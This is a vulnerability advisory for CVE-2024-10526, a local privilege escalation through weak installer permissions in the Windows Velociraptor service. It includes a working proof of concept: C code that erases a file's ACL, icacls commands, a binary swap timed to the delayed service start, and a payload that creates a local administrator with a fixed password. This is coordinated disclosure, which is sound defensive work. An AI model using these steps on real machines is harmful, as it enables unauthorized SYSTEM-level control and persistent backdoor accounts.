Local privilege escalation in Windows Velociraptor service
21/11/2024 - Download
Product
Velociraptor
Severity
High
Fixed Version(s)
0.73.3
Affected Version(s)
< 0.73.3
CVE Number
CVE-2024-10526
Authors
Description
Presentation
Velociraptor is an advanced digital forensic and incident response tool that permits collecting host-based state information using the Velociraptor Query Language (VQL).
Issue(s)
The MSI installer file grants dangerous permissions to standard users such as the capability to modify ACLs of the installation directory, configuration files and binaries. Standard users can then grant themselves full control over the files, leading to command execution as SYSTEM.
Timeline
| Date | Description |
|---|---|
| 2024.10.29 | Advisory sent to Rapid7 |
| 2024.11.03 | 0.73.3 was released to address this issue |
| 2024.11.22 | Public release |
Technical details
Description
When installed, the MSI installer grants BUILTIN\Users the WRITE_DAC permission over the C:\Program Files\Velociraptor\ directory and all its child objects, including the binary used by the C:\Program Files\Velociraptor\Velociraptor.exe service, which is run as SYSTEM.
PS C:\Program Files\Velociraptor> icacls.exe .\Velociraptor.exe
.\Velociraptor.exe BUILTIN\Users:(I)(WDAC)
BUILTIN\Administrators:(I)(F)
NT AUTHORITY\SYSTEM:(I)(F)
Successfully processed 1 files; Failed processing 0 files
The WRITE_DAC permission allows a standard user to modify the ACL of the aforementioned file, thus permitting to grant the user the Full Control permission over the binary. All the C:\Program Files\Velociraptor directory is impacted by this behavior, meaning it would be possible to tamper configuration files and other binaries too.
To perform such a modification, the following C program was developed:
#include <windows.h>
#include <stdio.h>
#include <sddl.h>
int main(int argc, char *argv[])
{
SECURITY_DESCRIPTOR sd = { 0 };
BOOL status;
status = InitializeSecurityDescriptor(&sd, SECURITY_DESCRIPTOR_REVISION);
if (status == FALSE) {
printf("InitializeSecurityDescriptor error: %x\n", GetLastError());
return 1;
}
status = SetSecurityDescriptorDacl(&sd, TRUE, NULL, FALSE);
if (status == FALSE) {
printf("SetSecurityDescriptorDacl error: %x\n", GetLastError());
return 1;
}
status = SetFileSecurityA(argv[1], DACL_SECURITY_INFORMATION, &sd);
if (status == FALSE) {
printf("SetFileSecurityA error: %x\n", GetLastError());
return 1;
}
else {
printf("ACL successfully removed!");
}
return 0;
}
Once launched, the ACL entries of the binary were cleared:
PS C:\Program Files\Velociraptor> EraseDACL.exe "C:\Program Files\Velociraptor\Velociraptor.exe"
ACL successfully removed!
After that, users can give themselves full control over the binary:
C:\Program Files\Velociraptor> icacls.exe .\Velociraptor.exe /grant BUILTIN\Users:(F)
file processed : .\Velociraptor.exe
Successfully processed 1 files; Failed processing 0 files
C:\Program Files\Velociraptor> icacls.exe .\Velociraptor.exe
.\Velociraptor.exe BUILTIN\Users:(F)
BUILTIN\Users:(I)(WDAC)
BUILTIN\Administrators:(I)(F)
NT AUTHORITY\SYSTEM:(I)(F)
However, at this point, the service does not permit low privileged users to stop it or kill the process, thus it was not possible to replace the binary while the service was in use.
PS C:\Program Files\Velociraptor> sc.exe sdshow velociraptor
D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
But it was noted that the service is configured to start with a delay:
PS C:\Program Files\Velociraptor> sc.exe qc velociraptor
SERVICE_NAME: velociraptor
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START (DELAYED)
ERROR_CONTROL : 1 NORMAL
SERVICE_START_NAME : LocalSystem
On Windows and without further configuration, this setting involves that the service will start two minutes after all the other automatic services were started.
As a consequence, it was possible to reboot the machine, and just copy another binary to replace the legitimate one and monitor for the service exit code to know that the new binary had been launched:
C:\Users\user> sc queryex velociraptor
SERVICE_NAME: velociraptor
TYPE : 10 WIN32_OWN_PROCESS
STATE : 1 STOPPED
WIN32_EXIT_CODE : 1077 (0x435)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x0
PID : 0
FLAGS :
C:\Users\user> copy adduser.exe "C:\Program Files\Velociraptor\Velociraptor.exe"
Overwrite C:\Program Files\Velociraptor\Velociraptor.exe? (Yes/No/All): Yes
1 file(s) copied.
C:\Users\user> sc queryex velociraptor
SERVICE_NAME: velociraptor
TYPE : 10 WIN32_OWN_PROCESS
STATE : 1 STOPPED
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x7d0
PID : 0
FLAGS :
The adduser.exe binary simply added a local user with administrator privileges on the machine:
#include <Windows.h>
int main(int argc, char* argv[]) {
system("net user synacktiv Password1 /add");
system("net localgroup Administrators synacktiv /add");
return 0;
}
After the execution of the binary by the service, the user is indeed created, thus permitting privilege escalation:
C:\Users\user> net user synacktiv
User name synacktiv
Full Name
[...]
Local Group Memberships *Administrators *Users
Global Group memberships *None
The command completed successfully.
Impact
This vulnerability is an arbitrary code execution via the modification of the binary ran by a service. It can be used to execute code as SYSTEM by overwriting the Velociraptor.exe file in C:\Program Files\Velociraptor\ and triggering the start of the Velociraptor service.